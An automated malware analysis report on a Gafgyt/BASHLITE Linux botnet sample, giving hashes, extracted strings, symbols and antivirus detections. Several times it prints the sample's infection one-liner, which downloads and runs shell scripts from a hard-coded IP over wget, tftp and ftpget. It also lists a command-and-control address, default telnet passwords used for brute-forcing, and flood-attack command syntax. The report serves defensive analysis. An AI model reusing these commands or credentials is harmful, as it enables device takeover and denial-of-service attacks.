Report #3384

Binary
ABI: ELFOSABI_SYSV
Size: 81.35KB
Type: ET_DYN
trid: 50.1% ELF Executable and Linkable format; 49.8% ELF Executable and Linkable format
type: ELF
Wordsize: 32
Architecture: x86
Hashes
md5: c9c03e18c3fcb8a5f84fc6910a16a533
sha1: 932639a5f0c99a60a3f867c06cadb1cdd1f8c1be
crc32: 0x4278d51e
sha224: 3d2083e610c74ada4ba726485615198ae5fe2abffe52c767315e690b
sha256: 043f57ddc3d6e2f1baa5968571d4fadbd95adaa7287a828b895943a7223fa9ed
sha384: 829614405dd21fb085afab897ab4d841f23c1a0e9d23af1ff8b9e97c9a5103cab393c22d98e42af5aac5603aa6ecbe01
sha512: 87cd3989979dceb5355f2b687ff4c45e426cafc738f0f5a559a0b726be4a6378b36ef24d15955a270a9838b25a27bdffc5a1538ec7b773c4b0c42821784bda7e
ssdeep: 1536:fltXw90+a0Al1UaCDWc7dhQ8/JAvNCq6uEJ:d1wYz1U/DWc7dhQ8/JWN
Community
Google: False
HashLib: False
YARA
Matches: url, IP, domain, contentis_base64, is__elf
Suspicious: True

Dwarf
List:
Number: 0
Files
Sys:
Home:
Proc: /proc/cpuinfo, /proc/net/route
Password:
Suspicious: True
Flags
Flags: 0
Packer
List: None
Packed: False
Network
IPs: 173.212.226.176:1665, Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.189.171.210/rgt.sh; chmod +x rgt.sh; sh rgt.sh; tftp 5.189.171.210 -c get bgr1.sh; chmod +x bgr1.sh; sh bgr1.sh; tftp -r bgr2.sh -g 5.189.171.210; chmod +x bgr2.sh; sh bgr2.sh; ftpget -u ftp 5.189.171.210 rgt1.sh rgt1.sh; chmod +x rgt1.sh; sh rgt1.sh; rm -rf rgt.sh bgr1.sh bgr2.sh rgt1.sh
URLs: /lib/ld-linux.so.2, libpthread.so.0, cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.189.171.210/rgt.sh; chmod +x rgt.sh; sh rgt.sh; tftp 5.189.171.210 -c get bgr1.sh; chmod +x bgr1.sh; sh bgr1.sh; tftp -r bgr2.sh -g 5.189.171.210; chmod +x bgr2.sh; sh bgr2.sh; ftpget -u ftp 5.189.171.210 rgt1.sh rgt1.sh; chmod +x rgt1.sh; sh rgt1.sh; rm -rf rgt.sh bgr1.sh bgr2.sh rgt1.sh, GET rgt.sh
Mails:
Suspicious: True
Strings
List
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.189.171.210/rgt.sh; chmod +x rgt.sh; sh rgt.sh; tftp 5.189.171.210 -c get bgr1.sh; chmod +x bgr1.sh; sh bgr1.sh; tftp -r bgr2.sh -g 5.189.171.210; chmod +x bgr2.sh; sh bgr2.sh; ftpget -u ftp 5.189.171.210 rgt1.sh rgt1.sh; chmod +x rgt1.sh; sh rgt1.sh; rm -rf rgt.sh bgr1.sh bgr2.sh rgt1.sh
.note.gnu.build-id
.plt.got
173.212.226.176:1665
__x86.get_pc_thunk.cx
__x86.get_pc_thunk.ax
GET rgt.sh
.gnu.hash
libc.so.6
/etc/rc.conf
.got.plt
.rel.plt
.rel.dyn
0.0.0.0
/lib/ld-linux.so.2
None Killed.
Killed %d.
libpthread.so.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
contains_fail
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
TELNET LOGIN CRACKED - %s:%s:%s
Telnet'd %s|%s|%s|23
pass
fork failed
pass
infected
unctelnet %s|%s|%s|23
REPORT %s:%s:%s
Version: %d.%d
Range %d->%d
>%s.t && cd %s ; >retrieve
My IP: %s
FUK YEA I DO (%s)
Invalid flag "%s"
8.8.8.8
My Public IP: %s
TEST %s
BUILD %s
BUILD %s
pipe@@GLIBC_2.0
kill@@GLIBC_2.0
PONG!
_Jv_RegisterClasses
_Jv_RegisterClasses
get_telstate_host
socket_connect
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
deregister_tm_clones
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
VIEWPAGE <http ip url>
admin1234
admin123
sendHTTP2
sendHTTP
tcpcsum
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve
PONG
7ujMko0admin
commServer
SCAN <threads> <timeout>
inet_addr
/boot/
INFECTION SUCCESS - %s:%s:%s
currentServer
useragents
FAILED TO INFECT - %s:%s:%s
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
makeIPPacket
usernames
KILLATTK
administrator
Administrator
password
sendTCP
smcadmin
gethostbyname
gethostbyname
processCmd
passwords
KILLSUB
UDP <target> <port (0 for random)> <time> <netmask> <packet size> <poll interval> <sleep check> <sleep time(ms)>
getHost
usleep@@GLIBC_2.0
socket@@GLIBC_2.0
execl@@GLIBC_2.0
admin2
connect
connect

Symbols
List: crtstuff.c, __JCR_LIST__, deregister_tm_clones, register_tm_clones, __do_global_dtors_aux, completed.6578, __do_global_dtors_aux_fini_array_entry, frame_dummy, __frame_dummy_init_array_entry, test2.c, Q, c, i.5070, printchar, prints, printi, print, fdopen_pids, hextable, ipState, .L322, .L324, .L325, .L326, .L327, .L328, .L329, .L330, .L331, crtstuff.c, __FRAME_END__, __JCR_END__, __init_array_end, _DYNAMIC, __init_array_start, __GNU_EH_FRAME_HDR, _GLOBAL_OFFSET_TABLE_, setsockopt@@GLIBC_2.0, __libc_csu_fini, sendTCP, dup2@@GLIBC_2.0, strstr@@GLIBC_2.0, gotIP, contains_success, strcmp@@GLIBC_2.0, useragents, tmpdirs, read@@GLIBC_2.0, sclose, _ITM_deregisterTMCloneTable, __x86.get_pc_thunk.bx, data_start, dupppp, processCmd, printf@@GLIBC_2.0, rangesA, versionnnn, readUntil, read_with_timeout, _exit@@GLIBC_2.0, sigprocmask@@GLIBC_2.0, free@@GLIBC_2.0, mainCommSock, memcpy@@GLIBC_2.0, csum, contains_response, bzero@@GLIBC_2.0, fgets@@GLIBC_2.0, StartTheLelz, isspace@@GLIBC_2.0, advances2, _edata, spoofTest, read_until_response, fclose@@GLIBC_2.1, time@@GLIBC_2.0, inet_ntoa@@GLIBC_2.0, currentServer, contains_string, recvLine, getRandomPublicIP, signal@@GLIBC_2.0, getRandomPublicIPA, sleep@@GLIBC_2.0, select@@GLIBC_2.0, chdir@@GLIBC_2.0, listFork, _fini, getRandomPublicIPC, infectedmessage, advance_state, macAddress, subversionnnn, sendSTD, usernames, pids, htons@@GLIBC_2.0, trim, fdpopen, initConnection, getsockopt@@GLIBC_2.0, __x86.get_pc_thunk.dx, ioctl@@GLIBC_2.0, sendHTTP2, fdpclose, fdgets, rangesB1, __cxa_finalize@@GLIBC_2.1.3, sendCNC, perror@@GLIBC_2.0, bcopy@@GLIBC_2.0, waitpid@@GLIBC_2.0, passwords, usleep@@GLIBC_2.0, strcat@@GLIBC_2.0, strcpy@@GLIBC_2.0, getpid@@GLIBC_2.0, ourPublicIP, reset_telstate, malloc@@GLIBC_2.0, __data_start, getBuild, system@@GLIBC_2.0, ntohl@@GLIBC_2.0, getdtablesize@@GLIBC_2.0, rangesC2, __gmon_start__, exit@@GLIBC_2.0, kill@@GLIBC_2.0, makeRandomStr, __dso_handle, open@@GLIBC_2.0, socket_connect, _IO_stdin_used, getHost, setsid@@GLIBC_2.0, feof@@GLIBC_2.0, srand@@GLIBC_2.0, strchr@@GLIBC_2.0, getcwd@@GLIBC_2.0, szprintf, strlen@@GLIBC_2.0, ourIP, __libc_start_main@@GLIBC_2.0, write@@GLIBC_2.0, oldranges, strcasecmp@@GLIBC_2.0, __libc_csu_init, fcntl@@GLIBC_2.0, sigaddset@@GLIBC_2.0, uppercase, fopen@@GLIBC_2.1, memset@@GLIBC_2.0, snprintf@@GLIBC_2.0, sendHTTP, _end, __errno_location@@GLIBC_2.0, getOurIP, fails, strncpy@@GLIBC_2.0, _start, makeIPPacket, _fp_hw, numpids, prctl@@GLIBC_2.0, herror@@GLIBC_2.0, infected, execl@@GLIBC_2.0, sockprintf, pipe@@GLIBC_2.0, rand@@GLIBC_2.0, getRandomPublicIP2, wildString, sendUDP, vfork@@GLIBC_2.0, __bss_start, tcpcsum, main, __x86.get_pc_thunk.ax, sendto@@GLIBC_2.0, strtok@@GLIBC_2.0, getBogos, contains_fail, fork@@GLIBC_2.0, sigemptyset@@GLIBC_2.0, getRandomPublicIPB, htonl@@GLIBC_2.0, toupper@@GLIBC_2.0, findARandomIP, rand_cmwc, zprintf, _Jv_RegisterClasses, strcasestr@@GLIBC_2.1, getsockname@@GLIBC_2.0, init_rand, parseHex, connectTimeout, sprintf@@GLIBC_2.0, advances, rangesB2, atoi@@GLIBC_2.0, matchPrompt, getCores, rangechoice, socket@@GLIBC_2.0, __TMC_END__, _ITM_registerTMCloneTable, scanPid, get_telstate_host, inet_addr@@GLIBC_2.0, negotiate, rangesC3, gethostbyname@@GLIBC_2.0, successes, shutdown@@GLIBC_2.0, fputs@@GLIBC_2.0, connect@@GLIBC_2.0, _init, commServer, recv@@GLIBC_2.0, echoLoader, close@@GLIBC_2.0, rangesC1, __x86.get_pc_thunk.cx, oldranges2, infect, contains_infectmessage, send@@GLIBC_2.0, getRandomIP
Number: 258
Reason: None
Suspicious: False
Version
Version: EV_CURRENT
Foremost
Matches: None
Suspicious: False
Sections
List: .interp, .note.ABI-tag, .note.gnu.build-id, .gnu.hash, .dynsym, .dynstr, .gnu.version, .gnu.version_r, .rel.dyn, .rel.plt, .init, .plt, .plt.got, .text, .fini, .rodata, .eh_frame_hdr, .eh_frame, .init_array, .fini_array, .jcr, .dynamic, .got, .got.plt, .data, .bss, .comment, .symtab, .strtab, .shstrtab
Number: 31
Suspicious: False
Segments
Number: 9
Suspicious: False
Compilers
List: GCC: (Debian 6.3.0-18) 6.3.0 20170516
Identified: 1
Suspicious: False
Functions
List: setsockopt@GLIBC_2.0 (2), dup2@GLIBC_2.0 (2), strstr@GLIBC_2.0 (2), strcmp@GLIBC_2.0 (2), read@GLIBC_2.0 (3), _ITM_deregisterTMCloneTable, printf@GLIBC_2.0 (2), _exit@GLIBC_2.0 (2), sigprocmask@GLIBC_2.0 (2), free@GLIBC_2.0 (2), memcpy@GLIBC_2.0 (2), bzero@GLIBC_2.0 (2), fgets@GLIBC_2.0 (2), isspace@GLIBC_2.0 (2), fclose@GLIBC_2.1 (4), time@GLIBC_2.0 (2), inet_ntoa@GLIBC_2.0 (2), signal@GLIBC_2.0 (2), sleep@GLIBC_2.0 (2), select@GLIBC_2.0 (2), chdir@GLIBC_2.0 (2), htons@GLIBC_2.0 (2), getsockopt@GLIBC_2.0 (2), ioctl@GLIBC_2.0 (2), __cxa_finalize@GLIBC_2.1.3 (5), perror@GLIBC_2.0 (2), bcopy@GLIBC_2.0 (2), waitpid@GLIBC_2.0 (3), usleep@GLIBC_2.0 (2), strcat@GLIBC_2.0 (2), strcpy@GLIBC_2.0 (2), getpid@GLIBC_2.0 (2), malloc@GLIBC_2.0 (2), system@GLIBC_2.0 (2), ntohl@GLIBC_2.0 (2), getdtablesize@GLIBC_2.0 (2), __gmon_start__, exit@GLIBC_2.0 (2), kill@GLIBC_2.0 (2), open@GLIBC_2.0 (3), setsid@GLIBC_2.0 (2), feof@GLIBC_2.0 (2), srand@GLIBC_2.0 (2), strchr@GLIBC_2.0 (2), getcwd@GLIBC_2.0 (2), strlen@GLIBC_2.0 (2), __libc_start_main@GLIBC_2.0 (2), write@GLIBC_2.0 (3), strcasecmp@GLIBC_2.0 (2), fcntl@GLIBC_2.0 (3), sigaddset@GLIBC_2.0 (2), fopen@GLIBC_2.1 (4), memset@GLIBC_2.0 (2), snprintf@GLIBC_2.0 (2), __errno_location@GLIBC_2.0 (3), strncpy@GLIBC_2.0 (2), prctl@GLIBC_2.0 (2), herror@GLIBC_2.0 (2), execl@GLIBC_2.0 (2), pipe@GLIBC_2.0 (2), rand@GLIBC_2.0 (2), vfork@GLIBC_2.0 (2), sendto@GLIBC_2.0 (3), strtok@GLIBC_2.0 (2), fork@GLIBC_2.0 (2), sigemptyset@GLIBC_2.0 (2), htonl@GLIBC_2.0 (2), toupper@GLIBC_2.0 (2), _Jv_RegisterClasses, strcasestr@GLIBC_2.1 (4), getsockname@GLIBC_2.0 (2), sprintf@GLIBC_2.0 (2), atoi@GLIBC_2.0 (2), socket@GLIBC_2.0 (2), _ITM_registerTMCloneTable, inet_addr@GLIBC_2.0 (2), gethostbyname@GLIBC_2.0 (2), shutdown@GLIBC_2.0 (2), fputs@GLIBC_2.0 (2), connect@GLIBC_2.0 (3), recv@GLIBC_2.0 (3), close@GLIBC_2.0 (3), send@GLIBC_2.0 (3), main, _IO_stdin_used, crtstuff.c, __JCR_LIST__, deregister_tm_clones, register_tm_clones, __do_global_dtors_aux, completed.6578, __do_global_dtors_aux_fini_array_entry, frame_dummy, __frame_dummy_init_array_entry, test2.c, Q, c, i.5070, printchar, prints, printi, print, fdopen_pids, hextable, ipState, .L322, .L324, .L325, .L326, .L327, .L328, .L329, .L330, .L331, crtstuff.c, __FRAME_END__, __JCR_END__, __init_array_end, _DYNAMIC, __init_array_start, __GNU_EH_FRAME_HDR, _GLOBAL_OFFSET_TABLE_, setsockopt@@GLIBC_2.0, __libc_csu_fini, sendTCP, dup2@@GLIBC_2.0, strstr@@GLIBC_2.0, gotIP, contains_success, strcmp@@GLIBC_2.0, useragents, tmpdirs, read@@GLIBC_2.0, sclose, _ITM_deregisterTMCloneTable, __x86.get_pc_thunk.bx, data_start, dupppp, processCmd, printf@@GLIBC_2.0, rangesA, versionnnn, readUntil, read_with_timeout, _exit@@GLIBC_2.0, sigprocmask@@GLIBC_2.0, free@@GLIBC_2.0, mainCommSock, memcpy@@GLIBC_2.0, csum, contains_response, bzero@@GLIBC_2.0, fgets@@GLIBC_2.0, StartTheLelz, isspace@@GLIBC_2.0, advances2, _edata, spoofTest, read_until_response, fclose@@GLIBC_2.1, time@@GLIBC_2.0, inet_ntoa@@GLIBC_2.0, currentServer, contains_string, recvLine, getRandomPublicIP, signal@@GLIBC_2.0, getRandomPublicIPA, sleep@@GLIBC_2.0, select@@GLIBC_2.0, chdir@@GLIBC_2.0, listFork, _fini, getRandomPublicIPC, infectedmessage, advance_state, macAddress, subversionnnn, sendSTD, usernames, pids, htons@@GLIBC_2.0, trim, fdpopen, initConnection, getsockopt@@GLIBC_2.0, __x86.get_pc_thunk.dx, ioctl@@GLIBC_2.0, sendHTTP2, fdpclose, fdgets, rangesB1, __cxa_finalize@@GLIBC_2.1.3, sendCNC, perror@@GLIBC_2.0, bcopy@@GLIBC_2.0, waitpid@@GLIBC_2.0, passwords, usleep@@GLIBC_2.0, strcat@@GLIBC_2.0, strcpy@@GLIBC_2.0, getpid@@GLIBC_2.0, ourPublicIP, reset_telstate, malloc@@GLIBC_2.0, __data_start, getBuild, system@@GLIBC_2.0, ntohl@@GLIBC_2.0, getdtablesize@@GLIBC_2.0, rangesC2, __gmon_start__, exit@@GLIBC_2.0, kill@@GLIBC_2.0, makeRandomStr, __dso_handle, open@@GLIBC_2.0, socket_connect, _IO_stdin_used, getHost, setsid@@GLIBC_2.0, feof@@GLIBC_2.0, srand@@GLIBC_2.0, strchr@@GLIBC_2.0, getcwd@@GLIBC_2.0, szprintf, strlen@@GLIBC_2.0, ourIP, __libc_start_main@@GLIBC_2.0, write@@GLIBC_2.0, oldranges, strcasecmp@@GLIBC_2.0, __libc_csu_init, fcntl@@GLIBC_2.0, sigaddset@@GLIBC_2.0, uppercase, fopen@@GLIBC_2.1, memset@@GLIBC_2.0, snprintf@@GLIBC_2.0, sendHTTP, _end, __errno_location@@GLIBC_2.0, getOurIP, fails, strncpy@@GLIBC_2.0, _start, makeIPPacket, _fp_hw, numpids, prctl@@GLIBC_2.0, herror@@GLIBC_2.0, infected, execl@@GLIBC_2.0, sockprintf, pipe@@GLIBC_2.0, rand@@GLIBC_2.0, getRandomPublicIP2, wildString, sendUDP, vfork@@GLIBC_2.0, __bss_start, tcpcsum, main, __x86.get_pc_thunk.ax, sendto@@GLIBC_2.0, strtok@@GLIBC_2.0, getBogos, contains_fail, fork@@GLIBC_2.0, sigemptyset@@GLIBC_2.0, getRandomPublicIPB, htonl@@GLIBC_2.0, toupper@@GLIBC_2.0, findARandomIP, rand_cmwc, zprintf, _Jv_RegisterClasses, strcasestr@@GLIBC_2.1, getsockname@@GLIBC_2.0, init_rand, parseHex, connectTimeout, sprintf@@GLIBC_2.0, advances, rangesB2, atoi@@GLIBC_2.0, matchPrompt, getCores, rangechoice, socket@@GLIBC_2.0, __TMC_END__, _ITM_registerTMCloneTable, scanPid, get_telstate_host, inet_addr@@GLIBC_2.0, negotiate, rangesC3, gethostbyname@@GLIBC_2.0, successes, shutdown@@GLIBC_2.0, fputs@@GLIBC_2.0, connect@@GLIBC_2.0, _init, commServer, recv@@GLIBC_2.0, echoLoader, close@@GLIBC_2.0, rangesC1, __x86.get_pc_thunk.cx, oldranges2, infect, contains_infectmessage, send@@GLIBC_2.0, getRandomIP
Present: True
Anti-Debug
Ptrace: False
Anti-disasm: False
Entry Point
Address: 0x1ac0
Suspicious: False
Embedded ELF
List: None
Identified: 0
Program Header
Size: 32
Number: 9
Offset: 52
Section Header
Size: 40
Number: 31
Offset: 82064
AVclass
gafgyt: 1
VirusTotal
md5: c9c03e18c3fcb8a5f84fc6910a16a533
sha1: 932639a5f0c99a60a3f867c06cadb1cdd1f8c1be
SCANS (DETECTION RATE = 36.21%)
Engine (version, update): detected / not detected, result
AVG (8.0.1489.320, 20170711): detected, ELF:Gafgyt-AG [Trj]
CMC (1.1.0.977, 20170711): not detected
MAX (2017.6.26.1, 20170711): detected, malware (ai score=89)
Bkav (1.3.0.9188, 20170711): not detected
K7GW (10.17.23935, 20170711): not detected
ALYac (1.0.1.9, 20170711): detected, Gen:Variant.Backdoor.Linux.Gafgyt.1
Avast (8.0.1489.320, 20170711): detected, ELF:Gafgyt-AG [Trj]
Avira (8.3.3.4, 20170711): not detected
Baidu (1.0.0.2, 20170710): not detected
Cyren (5.4.30.7, 20170711): not detected
DrWeb (7.0.28.2020, 20170711): detected, Linux.BackDoor.Fgt.719
GData (A:25.13319B:25.9974, 20170711): detected, Gen:Variant.Backdoor.Linux.Gafgyt.1
Panda (4.6.4.2, 20170711): not detected
VBA32 (3.12.26.4, 20170711): not detected
VIPRE (59452, 20170711): not detected
Zoner (1.0, 20170711): not detected
AVware (1.5.0.42, 20170711): not detected
ClamAV (0.99.2.0, 20170710): not detected
Comodo (27436, 20170711): not detected
F-Prot (4.7.1.166, 20170711): not detected
Ikarus (0.1.5.2, 20170711): detected, Trojan.Linux.Gafgyt
McAfee (6.0.6.653, 20170711): not detected
Rising (25.0.0.1, 20170711): detected, Backdoor.Gafgyt/Linux!1.A512 (classic)
Sophos (4.98.0, 20170711): detected, Linux/DDoS-BI
Yandex (5.5.1.3, 20170710): not detected
Zillya (2.0.0.3332, 20170711): not detected
Arcabit (1.0.0.817, 20170711): detected, Trojan.Backdoor.Linux.Gafgyt.1
Tencent (1.0.0.1, 20170711): not detected
ViRobot (2014.3.20.0, 20170711): not detected
Webroot (1.0.0.207, 20170711): not detected
Ad-Aware (3.0.3.1010, 20170711): detected, Gen:Variant.Backdoor.Linux.Gafgyt.1
AegisLab (4.2, 20170711): not detected
Emsisoft (4.0.1.883, 20170711): detected, Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
F-Secure (11.0.19100.45, 20170711): detected, Gen:Variant.Backdoor.Linux.Gafgyt.1
Fortinet (5.4.247.0, 20170629): detected, Linux/Gafgyt.B!tr
Jiangmin (16.0.100, 20170711): not detected
Kingsoft (2013.8.14.323, 20170711): not detected
Symantec (1.4.0.0, 20170711): not detected
nProtect (2017-07-11.02, 20170711): not detected
AhnLab-V3 (3.9.1.17914, 20170711): not detected
Antiy-AVL (3.0.0.1, 20170711): not detected
Kaspersky (15.0.1.13, 20170711): detected, HEUR:Backdoor.Linux.Gafgyt.af
Microsoft (1.1.13903.0, 20170711): detected, DDoS:Linux/Lightaidra
Qihoo-360 (1.0.0.1120, 20170711): not detected
TheHacker (6.8.0.5.1718, 20170709): not detected
ZoneAlarm (1.0, 20170711): detected, HEUR:Backdoor.Linux.Gafgyt.af
ESET-NOD32 (15727, 20170711): detected, a variant of Linux/Gafgyt.C
TrendMicro (9.862.0.1074, 20170711): not detected
BitDefender (7.2, 20170711): detected, Gen:Variant.Backdoor.Linux.Gafgyt.1
K7AntiVirus (10.17.23937, 20170711): not detected
Malwarebytes (2.1.1.1115, 20170711): not detected
TotalDefense (37.1.62.1, 20170711): not detected
CAT-QuickHeal (14.00, 20170711): not detected
NANO-Antivirus (1.0.76.17587, 20170711): not detected
MicroWorld-eScan (12.0.250.0, 20170711): detected, Gen:Variant.Backdoor.Linux.Gafgyt.1
SUPERAntiSpyware (5.6.0.1032, 20170711): not detected
McAfee-GW-Edition (v2015, 20170711): not detected
TrendMicro-HouseCall (9.950.0.1006, 20170711): detected, Linux_BASHLITE.SMJ1
total: 58
sha256: 043f57ddc3d6e2f1baa5968571d4fadbd95adaa7287a828b895943a7223fa9ed
scan_id: 043f57ddc3d6e2f1baa5968571d4fadbd95adaa7287a828b895943a7223fa9ed-1499774436
resource: c9c03e18c3fcb8a5f84fc6910a16a533
positives: 21
scan_date: 2017-07-11 12:00:36
verbose_msg: Scan finished, information embedded
response_code: 1
Ltrace
Trace:

Strace
Trace:
4291 execve "./malware" ["./malware"] -1 ENOENT (No such file or directory)
4291 write 2 "strace: exec: No such file or di"... 40 40
4291 exit_group 1 ?

Analysis
Ltrace: Statically-compiled samples cannot be ltraced.
Reason: Timeout
Status: Success
Strace: Success
Results: True

DNS
Query:
Response:
TCP
Info:
UDP
Info:
HTTP
Info:
Summary
DNS: False
TCP: False
UDP: False
HTTP: False

Binary
RF: confidence 100.00%, suspicious True
MLP: confidence 91.52%, suspicious True
SVM: confidence 93.09%, suspicious True